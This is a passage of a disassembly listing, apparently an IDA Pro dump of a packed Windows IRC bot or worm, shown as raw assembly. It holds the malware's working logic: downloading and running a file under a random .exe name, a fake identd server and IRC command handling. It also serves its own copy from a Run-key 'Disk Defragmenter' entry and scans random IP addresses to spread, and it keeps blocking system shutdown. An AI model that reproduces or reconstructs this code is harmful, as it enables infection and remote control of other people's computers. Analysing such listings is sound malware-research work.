; ---------------------------------------------------------------------------
loc_31202697: ; CODE XREF: sub_3120266C+22�j
lea eax, [ebp+var_110]
push 104h
push eax
call dword_312010B8 ; GetSystemDirectoryA
mov edi, dword_31201090
lea eax, [ebp+var_110]
push offset asc_31205DE0 ; "\\"
push eax
call edi ; lstrcatA
lea eax, [ebp+var_110]
push 6
push eax
call dword_312010D0 ; lstrlenA
lea eax, [ebp+eax+var_110]
push eax
call sub_31202B14
pop ecx
lea eax, [ebp+var_110]
pop ecx
push offset a_exe ; ".exe"
push eax
call edi ; lstrcatA
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_110]
push 40000000h
push eax
call dword_312010AC ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jnz short loc_3120270D
push 2
jmp short loc_3120272D
; ---------------------------------------------------------------------------
loc_3120270D: ; CODE XREF: sub_3120266C+9B�j
push esi
push esi
push esi
push esi
push [ebp+arg_0]
push ebx
call dword_3120114C ; InternetOpenUrlA
cmp eax, esi
mov [ebp+arg_0], eax
jnz short loc_31202730
push [ebp+var_4]
call dword_312010A4 ; CloseHandle
push 3
loc_3120272D: ; CODE XREF: sub_3120266C+26�j
; sub_3120266C+9F�j
pop eax
jmp short loc_31202781
; ---------------------------------------------------------------------------
loc_31202730: ; CODE XREF: sub_3120266C+B4�j
mov edi, 100000h
push edi
call sub_31203794
mov ebx, eax
pop ecx
lea eax, [ebp+var_8]
push eax
push edi
push ebx
push [ebp+arg_0]
call dword_31201150 ; InternetReadFile
lea eax, [ebp+var_C]
push esi
push eax
push [ebp+var_8]
push ebx
push [ebp+var_4]
call dword_312010A8 ; WriteFile
push [ebp+var_4]
call dword_312010A4 ; CloseHandle
lea eax, [ebp+var_110]
push 5
push eax
call sub_31202B44
push ebx
call sub_312037A8
add esp, 0Ch
xor eax, eax
loc_31202781: ; CODE XREF: sub_3120266C+C2�j
pop edi
pop esi
pop ebx
leave
retn
sub_3120266C endp
; =============== S U B R O U T I N E =======================================
sub_31202786 proc near ; CODE XREF: sub_31202280+D1�p
var_3CC = dword ptr -3CCh
var_3C8 = byte ptr -3C8h
var_364 = byte ptr -364h
var_300 = byte ptr -300h
var_200 = byte ptr -200h
var_100 = byte ptr -100h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 4
sub esp, 3CCh
push ebx
push ebp
push esi
push edi
push offset dword_31205FD0
mov esi, ecx
push [esp+3E0h+arg_0]
call dword_31201114 ; strstr
mov edi, dword_312010F0
pop ecx
mov ebx, eax
pop ecx
mov [esp+3DCh+var_3CC], ebx
call edi ; GetTickCount
sub eax, [esi+70h]
cmp eax, 927C0h
jbe short loc_312027C5
and dword ptr [esi+180h], 0
loc_312027C5: ; CODE XREF: sub_31202786+36�j
cmp dword ptr [esi+7Ch], 0
jz short loc_31202828
call edi ; GetTickCount
mov ecx, [esi+78h]
sub eax, [esi+74h]
imul ecx, 3E8h
cmp eax, ecx
jbe short loc_31202828
lea eax, [esp+3DCh+var_200]
push eax
call sub_3120266C
test eax, eax
pop ecx
jnz short loc_31202828
call edi ; GetTickCount
push dword ptr [esi+78h]
and dword ptr [esi+7Ch], 0
mov [esi+70h], eax
lea eax, [esp+3E0h+var_3C8]
push offset a1D ; "-1,%d"
push eax
mov dword ptr [esi+180h], 1
call dword_31201130 ; wsprintfA
add esp, 0Ch
lea eax, [esp+3DCh+var_3C8]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_3120238E
loc_31202828: ; CODE XREF: sub_31202786+43�j
; sub_31202786+55�j ...
test ebx, ebx
jz loc_31202A66
push ebx
call dword_312010D0 ; lstrlenA
cmp eax, 0Ah
jle loc_31202A66
lea ebp, [ebx+8]
mov ebx, dword_31201118
push 7Ch
push ebp
call ebx ; strchr
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz loc_31202A66
and byte ptr [edi], 0
push ebp
call dword_312010D0 ; lstrlenA
cmp eax, 100h
jge loc_31202A8D
push dword_31205FCC
lea eax, [esp+3E0h+var_300]
push ebp
push eax
call sub_31201DD0
lea ebp, [edi+1]
push 7Ch
push ebp
mov byte ptr [edi], 7Ch
call ebx ; strchr
mov edi, eax
add esp, 14h
test edi, edi
jz loc_31202A66
and byte ptr [edi], 0
push ebp
call dword_312010D0 ; lstrlenA
cmp eax, 100h
jge loc_31202A8D
push dword_31205FCC
lea eax, [esp+3E0h+var_200]
push ebp
push eax
call sub_31201DD0
add esp, 0Ch
lea eax, [esp+3DCh+var_300]
push offset aE ; "e"
push eax
call dword_31201088 ; lstrcmpA
mov ebp, dword_31201094
test eax, eax
jnz loc_312029CD
lea eax, [esp+3DCh+var_200]
push eax
call dword_312010D0 ; lstrlenA
cmp eax, 0FFh
jge loc_312029CD
cmp dword ptr [esi+180h], 0
jnz loc_312029CD
cmp dword ptr [esi+7Ch], 0
jnz loc_312029CD
lea eax, [edi+1]
push 7Ch
push eax
call ebx ; strchr
mov ebx, eax
pop ecx
test ebx, ebx
pop ecx
jz loc_312029AE
and byte ptr [ebx], 0
lea eax, [edi+1]
push eax
call dword_312010D0 ; lstrlenA
cmp eax, 100h
jge loc_31202A8D
lea eax, [edi+1]
push eax
lea eax, [esp+3E0h+var_100]
push eax
call ebp ; lstrcpyA
push [esp+3DCh+var_3CC]
lea eax, [esi+80h]
mov byte ptr [edi], 7Ch
push eax
call ebp ; lstrcpyA
mov byte ptr [ebx], 7Ch
and byte ptr [edi], 0
cmp [esp+3DCh+var_100], 63h
jle short loc_312029BB
lea eax, [esp+3DCh+var_FF]
push eax
call dword_31201104 ; atoi
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_312029BB
cmp ebx, 0E10h
jnb short loc_312029BB
call dword_31201128 ; rand
xor edx, edx
mov dword ptr [esi+7Ch], 1
div ebx
mov [esi+78h], edx
call dword_312010F0 ; GetTickCount
mov [esi+74h], eax
jmp short loc_312029BB
; ---------------------------------------------------------------------------
loc_312029AE: ; CODE XREF: sub_31202786+1A0�j
push [esp+3DCh+var_3CC]
lea eax, [esi+80h]
push eax
call ebp ; lstrcpyA
loc_312029BB: ; CODE XREF: sub_31202786+1EA�j
; sub_31202786+1FF�j ...
lea eax, [esi+80h]
push offset asc_31205E38 ; "|"
push eax
call dword_31201090 ; lstrcatA
loc_312029CD: ; CODE XREF: sub_31202786+15C�j
; sub_31202786+175�j ...
mov ebx, dword_31201088
lea eax, [esp+3DCh+var_300]
push offset aI ; "i"
push eax
call ebx ; lstrcmpA
test eax, eax
jnz short loc_31202A43
lea eax, [esp+3DCh+var_3C8]
push offset dword_31205FF0
push eax
call ebp ; lstrcpyA
lea eax, [esp+3DCh+var_3C8]
push 63h
push eax
push 7
push 400h
call dword_31201088+4
push ds:dword_31206034
lea eax, [esp+3E0h+var_3C8]
push eax
lea eax, [esp+3E4h+var_364]
push ds:dword_31206030
push dword_31205FF8
push offset aDD10SD ; "%d,%d,10%s,%d"
push eax
call dword_31201130 ; wsprintfA
add esp, 18h
lea eax, [esp+3DCh+var_364]
mov ecx, esi
push eax
lea eax, [esi+30h]
push eax
call sub_3120238E
loc_31202A43: ; CODE XREF: sub_31202786+25E�j
lea eax, [esp+3DCh+var_300]
push offset aQ ; "q"
push eax
call ebx ; lstrcmpA
test eax, eax
jnz short loc_31202A63
cmp [esi+180h], eax
jz short loc_31202A63
push 1
pop eax
jmp short loc_31202A8F
; ---------------------------------------------------------------------------
loc_31202A63: ; CODE XREF: sub_31202786+2CE�j
; sub_31202786+2D6�j
mov byte ptr [edi], 7Ch
loc_31202A66: ; CODE XREF: sub_31202786+A4�j
; sub_31202786+B4�j ...
cmp dword ptr [esi+180h], 0
jz short loc_31202A8D
push offset aJoin ; "JOIN"
push [esp+3E0h+arg_0]
call dword_31201114 ; strstr
pop ecx
test eax, eax
pop ecx
jz short loc_31202A8D
call dword_31201128 ; rand
loc_31202A8D: ; CODE XREF: sub_31202786+E3�j
; sub_31202786+124�j ...
xor eax, eax
loc_31202A8F: ; CODE XREF: sub_31202786+2DB�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 3CCh
retn 4
sub_31202786 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31202A9C proc near ; CODE XREF: sub_312014E6+8�p
; sub_31202405+57�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
push esi
push edi
pusha
rdtsc
mov [ebp+var_8], eax
popa
mov [ebp+var_4], esp
call dword_312010F0 ; GetTickCount
mov ecx, [ebp+var_4]
imul ecx, [ebp+var_8]
add eax, ecx
push eax
call dword_31201108 ; srand
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_31202A9C endp
; =============== S U B R O U T I N E =======================================
sub_31202ACA proc near ; CODE XREF: sub_31201C40+EA�p
; UPX0:31202E0A�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push 1
push 0
call dword_31201084 ; CreateMutexA
retn
sub_31202ACA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31202AD9 proc near ; CODE XREF: sub_31202E66+E7�p
; sub_31202E66+F2�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_312010C8 ; CreateThread
pop ebp
retn
sub_31202AD9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31202AF3 proc near ; CODE XREF: sub_31202C78+12C�p
; sub_31202E66+CD�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
lea eax, [ebp+arg_4]
push eax
xor eax, eax
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push eax
push eax
call dword_312010C8 ; CreateThread
push eax
call dword_312010A4 ; CloseHandle
pop ebp
retn
sub_31202AF3 endp
; =============== S U B R O U T I N E =======================================
sub_31202B14 proc near ; CODE XREF: sub_31201E80+88�p
; sub_31201E80+155�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
mov ebx, [esp+4+arg_0]
push esi
push edi
mov edi, [esp+0Ch+arg_4]
xor esi, esi
test edi, edi
jle short loc_31202B3C
loc_31202B25: ; CODE XREF: sub_31202B14+26�j
call dword_31201128 ; rand
push 1Ah
cdq
pop ecx
idiv ecx
add dl, 61h
mov [esi+ebx], dl
inc esi
cmp esi, edi
jl short loc_31202B25
loc_31202B3C: ; CODE XREF: sub_31202B14+F�j
and byte ptr [ebx+edi], 0
pop edi
pop esi
pop ebx
retn
sub_31202B14 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31202B44 proc near ; CODE XREF: sub_31201361+16B�p
; sub_3120266C+105�p
var_54 = dword ptr -54h
var_24 = word ptr -24h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 54h
push esi
push edi
push 44h
xor esi, esi
pop edi
lea eax, [ebp+var_54]
push edi
push esi
push eax
call sub_312037C0 ; memset
mov ax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_24], ax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_54]
push eax
push esi
push esi
push esi
push esi
push esi
push esi
mov [ebp+var_54], edi
push [ebp+arg_0]
push esi
call dword_31201080 ; CreateProcessA
push [ebp+var_C]
mov esi, dword_312010A4
mov edi, eax
call esi ; CloseHandle
push [ebp+var_10]
call esi ; CloseHandle
mov eax, edi
pop edi
pop esi
leave
retn
sub_31202B44 endp
; =============== S U B R O U T I N E =======================================
sub_31202B9A proc near ; CODE XREF: sub_31201E80+20�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
push edi
call dword_31201168 ; inet_addr
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_31202BB7
test esi, esi
jnz short loc_31202BC9
cmp byte ptr [edi], 30h
jz short loc_31202BD0
loc_31202BB7: ; CODE XREF: sub_31202B9A+12�j
push edi
call dword_3120116C ; gethostbyname
test eax, eax
jz short loc_31202BC9
mov eax, [eax+0Ch]
mov eax, [eax]
mov esi, [eax]
loc_31202BC9: ; CODE XREF: sub_31202B9A+16�j
; sub_31202B9A+26�j
cmp esi, 0FFFFFFFFh
jnz short loc_31202BD0
xor esi, esi
loc_31202BD0: ; CODE XREF: sub_31202B9A+1B�j
; sub_31202B9A+32�j
mov eax, esi
pop edi
pop esi
retn
sub_31202B9A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31202BD5 proc near ; CODE XREF: sub_3120321A+37�p
; sub_312032DA+4E�p
var_34 = byte ptr -34h
push ebp
mov ebp, esp
sub esp, 34h
lea eax, [ebp+var_34]
push 31h
push eax
call dword_31201160 ; gethostname
cmp eax, 0FFFFFFFFh
jnz short loc_31202BF6
call dword_31201164 ; WSAGetLastError
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_31202BF6: ; CODE XREF: sub_31202BD5+15�j
lea eax, [ebp+var_34]
push eax
call dword_3120116C ; gethostbyname
test eax, eax
jnz short loc_31202C0B
mov eax, 100007Fh
leave
retn
; ---------------------------------------------------------------------------
loc_31202C0B: ; CODE XREF: sub_31202BD5+2D�j
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
leave
retn
sub_31202BD5 endp
; =============== S U B R O U T I N E =======================================
sub_31202C14 proc near ; CODE XREF: sub_31202280:loc_312022BB�p
; sub_31202280+DE�p ...
var_4 = byte ptr -4
push ecx
lea eax, [esp+4+var_4]
push 0
push eax
call dword_31201148 ; InternetGetConnectedState
neg eax
sbb eax, eax
neg eax
pop ecx
retn
sub_31202C14 endp
; =============== S U B R O U T I N E =======================================
sub_31202C2A proc near ; DATA XREF: sub_31202C78+127�o
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push 0
push dword_31205FFC
push dword_31205FF4
push esi
call dword_3120119C ; send
push 7D0h
call dword_312010D4 ; Sleep
push offset dword_31205FF8
call dword_3120107C ; InterlockedIncrement
push 2
push esi
call dword_3120117C ; shutdown
push esi
call dword_31201194 ; closesocket
push 0
call dword_312010BC ; ExitThread
xor eax, eax
pop esi
retn 4
sub_31202C2A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31202C78 proc near ; DATA XREF: sub_31202E66+ED�o
var_130 = byte ptr -130h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 130h
push ebx
push edi
call sub_31202A9C
lea eax, [ebp+var_130]
push 104h
push eax
push offset aDiskDefragment ; "Disk Defragmenter"
xor ebx, ebx
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
mov dword_31205FF8, ebx
call sub_312033EE
add esp, 14h
test eax, eax
jnz loc_31202DAD
push esi
push ebx
push ebx
push 3
push ebx
push 1
lea eax, [ebp+var_130]
push 80000000h
push eax
call dword_312010AC ; CreateFileA
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_31202CE4
push 1
call dword_312010BC ; ExitThread
loc_31202CE4: ; CODE XREF: sub_31202C78+62�j
push ebx
push esi
call dword_31201074 ; GetFileSize
push eax
mov dword_31205FFC, eax
call sub_31203794
pop ecx
mov dword_31205FF4, eax
lea ecx, [ebp+var_4]
push ebx
push ecx
push dword_31205FFC
push eax
push esi
call dword_31201078 ; ReadFile
mov eax, [ebp+var_4]
push esi
mov dword_31205FFC, eax
call dword_312010A4 ; CloseHandle
push ebx
push 1
push 2
call dword_31201180 ; socket
push 10h
mov edi, eax
pop esi
lea eax, [ebp+var_18]
push esi
push ebx
push eax
call sub_312037C0 ; memset
add esp, 0Ch
mov [ebp+var_18], 2
mov [ebp+var_14], ebx
loc_31202D46: ; CODE XREF: sub_31202C78+E5�j
; sub_31202C78+ED�j ...
call dword_31201128 ; rand
add eax, 7D0h
and eax, 1FFFh
cmp al, bl
mov ds:dword_31206028, eax
jz short loc_31202D46
xor ecx, ecx
mov cl, ah
test cl, cl
jz short loc_31202D46
push eax
call dword_31201184 ; ntohs
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push esi
push eax
push edi
call dword_31201188 ; bind
test eax, eax
jnz short loc_31202D46
push 64h
push edi
call dword_3120118C ; listen
mov [ebp+var_8], esi
pop esi
loc_31202D8F: ; CODE XREF: sub_31202C78+133�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_31201190 ; accept
push eax
push offset sub_31202C2A
call sub_31202AF3
pop ecx
pop ecx
jmp short loc_31202D8F
; ---------------------------------------------------------------------------
loc_31202DAD: ; CODE XREF: sub_31202C78+3D�j
push ebx
call dword_312010BC ; ExitThread
pop edi
xor eax, eax
pop ebx
leave
retn 4
sub_31202C78 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31202DBC proc near ; CODE XREF: sub_31202E66+39�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
lea eax, [ebp+var_190]
push esi
mov esi, dword_3120115C
push eax
push 2
call esi ; WSAStartup
lea eax, [ebp+var_190]
push eax
push 102h
call esi ; WSAStartup
pop esi
leave
retn
sub_31202DBC endp
; ---------------------------------------------------------------------------
loc_31202DE8: ; CODE XREF: UPX1:31208358�j
push 0
call dword_312010EC ; GetModuleHandleA
push offset aFtpupd_exe ; "ftpupd.exe"
mov ds:dword_3120602C, eax
call dword_3120106C ; DeleteFileA
call sub_31202A9C
push offset aUterm10 ; "uterm10"
call sub_31202ACA
pop ecx
mov ds:dword_31206000, eax
call dword_31201098 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_31202E2A
push 1
call dword_31201070 ; ExitProcess
loc_31202E2A: ; CODE XREF: UPX0:31202E20�j
call sub_31201BB8
call sub_31203552
call sub_312036BE
push offset sub_31202E66
call sub_31201C40
test eax, eax
pop ecx
jz short loc_31202E4F
push 0
call sub_31202E66
loc_31202E4F: ; CODE XREF: UPX0:31202E46�j
xor eax, eax
retn
; =============== S U B R O U T I N E =======================================
sub_31202E52 proc near ; CODE XREF: sub_31202280+5B�p
; sub_31202E66:loc_31202F76�p ...
push 0
push ds:dword_31206004
call dword_312010C4 ; WaitForSingleObject
neg eax
sbb eax, eax
inc eax
retn
sub_31202E52 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31202E66 proc near ; CODE XREF: UPX0:31202E4A�p
; DATA XREF: UPX0:31202E39�o
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_312011A8
push offset loc_31203816
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
push offset aU10x ; "u10x"
xor edi, edi
push edi
push 1
push edi
call dword_312010CC ; CreateEventA
mov ds:dword_31206004, eax
call sub_31202DBC
push offset aU9x ; "u9x"
push edi
push 2
call dword_31201068 ; OpenEventA
cmp eax, edi
jz short loc_31202EBD
push eax
call dword_312010C0 ; SetEvent
loc_31202EBD: ; CODE XREF: sub_31202E66+4E�j
mov [ebp+var_4], edi
push offset aU6 ; "u6"
call sub_31202ACA
mov [esp+8+var_8], offset aU8 ; "u8"
call sub_31202ACA
mov [esp+8+var_8], offset aU9 ; "u9"
call sub_31202ACA
mov [esp+8+var_8], offset aU10 ; "u10"
call sub_31202ACA
pop ecx
cmp [ebp+arg_0], edi
jz short loc_31202F2D
push offset aWs2_32 ; "ws2_32"
mov esi, dword_312010E0
call esi ; LoadLibraryA
push offset aWininet ; "wininet"
call esi ; LoadLibraryA
push offset aMsvcrt ; "msvcrt"
call esi ; LoadLibraryA
push offset aAdvapi32 ; "advapi32"
call esi ; LoadLibraryA
push offset aUser32 ; "user32"
call esi ; LoadLibraryA
push offset aUterm10 ; "uterm10"
call sub_31202ACA
pop ecx
mov ds:dword_31206000, eax
loc_31202F2D: ; CODE XREF: sub_31202E66+8C�j
push edi
push offset sub_31202FDD
call sub_31202AF3
pop ecx
pop ecx
push 1F4h
mov esi, dword_312010D4
call esi ; Sleep
push edi
push offset loc_31202463
call sub_31202AD9
push edi
push offset sub_31202C78
call sub_31202AD9
push edi
push offset sub_31201582
call sub_31202AD9
push edi
push offset sub_312032DA
call sub_31202AD9
add esp, 20h
loc_31202F76: ; CODE XREF: sub_31202E66+127�j
call sub_31202E52
test eax, eax
jnz short loc_31202F8F
push edi
call dword_31201018 ; AbortSystemShutdownA
push 1388h
call esi ; Sleep
jmp short loc_31202F76
; ---------------------------------------------------------------------------
loc_31202F8F: ; CODE XREF: sub_31202E66+117�j
or [ebp+var_4], 0FFFFFFFFh
call nullsub_1
xor eax, eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn 4
sub_31202E66 endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_31202FAC proc near ; CODE XREF: sub_31202FDD+F9�p
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
xor esi, esi
push edi
call sub_312037C6 ; strlen
test eax, eax
pop ecx
jbe short loc_31202FDA
loc_31202FBF: ; CODE XREF: sub_31202FAC+2C�j
mov al, [esi+edi]
cmp al, 0Ah
jz short loc_31202FCA
cmp al, 0Dh
jnz short loc_31202FCE
loc_31202FCA: ; CODE XREF: sub_31202FAC+18�j
and byte ptr [esi+edi], 0
loc_31202FCE: ; CODE XREF: sub_31202FAC+1C�j
push edi
inc esi
call sub_312037C6 ; strlen
cmp esi, eax
pop ecx
jb short loc_31202FBF
loc_31202FDA: ; CODE XREF: sub_31202FAC+11�j
pop edi
pop esi
retn
sub_31202FAC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31202FDD proc near ; DATA XREF: sub_31202E66+C8�o
var_154 = dword ptr -154h
var_148 = byte ptr -148h
var_48 = byte ptr -48h
var_28 = byte ptr -28h
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = dword ptr -14h
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 148h
push ebx
mov [ebp+var_8], esp
call sub_31202A9C
call dword_31201128 ; rand
push 4
cdq
pop ecx
idiv ecx
lea eax, [ebp+var_48]
add edx, 3
push edx
push eax
call sub_31202B14
lea eax, [ebp+var_48]
mov ebx, offset dword_31206008
push eax
push ebx
call sub_31203822 ; strcpy
add esp, 10h
mov [ebp+var_4], 10h
push 0
push 1
push 2
call dword_31201180 ; socket
push 0
mov [ebp+var_8], eax
mov [ebp+var_18], 2
call dword_31201158 ; ntohl
push 71h
mov [ebp+var_14], eax
call dword_31201184 ; ntohs
push [ebp+var_4]
mov [ebp+var_16], ax
lea eax, [ebp+var_18]
push eax
push [ebp+var_8]
call dword_31201188 ; bind
test eax, eax
jz short loc_31203069
push 1
pop eax
loc_31203064: ; CODE XREF: sub_31202FDD+A2�j
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_31203069: ; CODE XREF: sub_31202FDD+82�j
push esi
push edi
push 5
push [ebp+var_8]
call dword_3120118C ; listen
test eax, eax
jz short loc_31203081
push 1
pop eax
pop edi
pop esi
jmp short loc_31203064
; ---------------------------------------------------------------------------
loc_31203081: ; CODE XREF: sub_31202FDD+9B�j
mov edi, dword_312010D4
loc_31203087: ; CODE XREF: sub_31202FDD+C6�j
; sub_31202FDD+E8�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_28]
push eax
push [ebp+var_8]
call dword_31201190 ; accept
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_312030A5
push 64h
call edi ; Sleep
jmp short loc_31203087
; ---------------------------------------------------------------------------
loc_312030A5: ; CODE XREF: sub_31202FDD+C0�j
push 0
lea eax, [ebp+var_148]
push 100h
push eax
push esi
call dword_31201198 ; recv
test eax, eax
jnz short loc_312030C7
loc_312030BE: ; CODE XREF: sub_31202FDD+157�j
push esi
call dword_31201194 ; closesocket
jmp short loc_31203087
; ---------------------------------------------------------------------------
loc_312030C7: ; CODE XREF: sub_31202FDD+DF�j
and [ebp+eax+var_148], 0
lea eax, [ebp+var_148]
push eax
call sub_31202FAC
lea eax, [ebp+var_148]
mov [esp+154h+var_154], offset aUseridUnix ; " : USERID : UNIX : "
push eax
call sub_3120381C ; strcat
lea eax, [ebp+var_148]
push ebx
push eax
call sub_3120381C ; strcat
lea eax, [ebp+var_148]
push offset asc_31205E90 ; "\r\n"
push eax
call sub_3120381C ; strcat
add esp, 18h
lea eax, [ebp+var_148]
push 0
push eax
call sub_312037C6 ; strlen
pop ecx
push eax
lea eax, [ebp+var_148]
push eax
push esi
call dword_3120119C ; send
push 1388h
call edi ; Sleep
jmp short loc_312030BE
sub_31202FDD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31203136 proc near ; DATA XREF: sub_31203196+54�o
; sub_3120321A+63�o ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_31203145
push 1
pop eax
jmp short locret_31203192
; ---------------------------------------------------------------------------
loc_31203145: ; CODE XREF: sub_31203136+8�j
mov al, byte ptr [ebp+arg_0+3]
push ebx
mov [ebp+var_1], al
xor bl, bl
loc_3120314E: ; CODE XREF: sub_31203136+57�j
call sub_31202E52
test eax, eax
jnz short loc_3120318F
call sub_31202C14
test eax, eax
jz short loc_3120318F
cmp [ebp+var_1], bl
jz short loc_31203188
mov byte ptr [ebp+arg_0+3], bl
push [ebp+arg_0]
call sub_31201651
pop ecx
call dword_31201128 ; rand
cdq
mov ecx, 15Eh
idiv ecx
add edx, ecx
push edx
call dword_312010D4 ; Sleep
loc_31203188: ; CODE XREF: sub_31203136+2D�j
inc bl
cmp bl, 0FFh
jb short loc_3120314E
loc_3120318F: ; CODE XREF: sub_31203136+1F�j
; sub_31203136+28�j
xor eax, eax
pop ebx
locret_31203192: ; CODE XREF: sub_31203136+D�j
leave
retn 4
sub_31203136 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_31203196 proc near ; DATA XREF: sub_3120321A+73�o
; sub_312032DA+AA�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
cmp byte ptr [ebp+arg_0], 7Fh
jnz short loc_312031A4
push 1
pop eax
jmp short loc_31203216
; ---------------------------------------------------------------------------
loc_312031A4: ; CODE XREF: sub_31203196+7�j
push ebx
push esi
call sub_31202A9C
mov esi, dword_31201128
xor ebx, ebx
loc_312031B3: ; CODE XREF: sub_31203196+7A�j
call sub_31202E52
test eax, eax
jnz short loc_31203212
call sub_31202C14
test eax, eax
jz short loc_31203212
call esi ; rand
mov byte ptr [ebp+arg_0+2], al
call esi ; rand
push offset dword_31206030
mov byte ptr [ebp+arg_0+3], al
call dword_3120107C ; InterlockedIncrement
push [ebp+arg_0]
call sub_31201651
test eax, eax
pop ecx
jnz short loc_312031F6
push [ebp+arg_0]
push offset sub_31203136
call sub_31202AF3
pop ecx
pop ecx
loc_312031F6: ; CODE XREF: sub_31203196+4F�j
call esi ; rand
cdq
mov ecx, 15Eh
idiv ecx
add edx, ecx
push edx
call dword_312010D4 ; Sleep
inc ebx
cmp ebx, 8000h
jl short loc_312031B3
loc_31203212: ; CODE XREF: sub_31203196+24�j
; sub_31203196+2D�j
pop esi
xor eax, eax
pop ebx
loc_31203216: ; CODE XREF: sub_31203196+C�j
pop ebp
retn 4
sub_31203196 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_3120321A proc near ; DATA XREF: sub_312032DA+C2�o
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
call sub_31202A9C
call sub_31202E52
test eax, eax
jnz loc_312032CC
push ebx
push esi
mov esi, dword_31201128
push edi
loc_31203239: ; CODE XREF: sub_3120321A+41�j
; sub_3120321A+A9�j
call esi ; rand
mov byte ptr [ebp+var_4+1], al
call esi ; rand
mov byte ptr [ebp+var_4+3], al
call esi ; rand
mov byte ptr [ebp+var_4+2], al
loc_31203248: ; CODE XREF: sub_3120321A+35�j
call esi ; rand
cmp al, 7Fh
mov byte ptr [ebp+var_4], al
jz short loc_31203248
call sub_31202BD5
mov edi, [ebp+var_4]
cmp edi, eax
jz short loc_31203239
call sub_31202C14
test eax, eax
jz short loc_3120329E
push offset dword_31206030
call dword_3120107C ; InterlockedIncrement
push edi
call sub_31201651
test eax, eax
pop ecx
jnz short loc_312032A9
push edi
push offset sub_31203136
call sub_31202AF3
pop ecx
pop ecx
push 4
pop ebx
loc_3120328C: ; CODE XREF: sub_3120321A+80�j
push edi
push offset sub_31203196
call sub_31202AF3
pop ecx
dec ebx
pop ecx
jnz short loc_3120328C
jmp short loc_312032A9
; ---------------------------------------------------------------------------
loc_3120329E: ; CODE XREF: sub_3120321A+4A�j
push 2710h
call dword_312010D4 ; Sleep
loc_312032A9: ; CODE XREF: sub_3120321A+60�j
; sub_3120321A+82�j
call esi ; rand
cdq
mov ecx, 15Eh
idiv ecx
add edx, ecx
push edx
call dword_312010D4 ; Sleep
call sub_31202E52
test eax, eax
jz loc_31203239
pop edi
pop esi
pop ebx
loc_312032CC: ; CODE XREF: sub_3120321A+10�j
push 0
call dword_312010BC ; ExitThread
xor eax, eax
leave
retn 4
sub_3120321A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
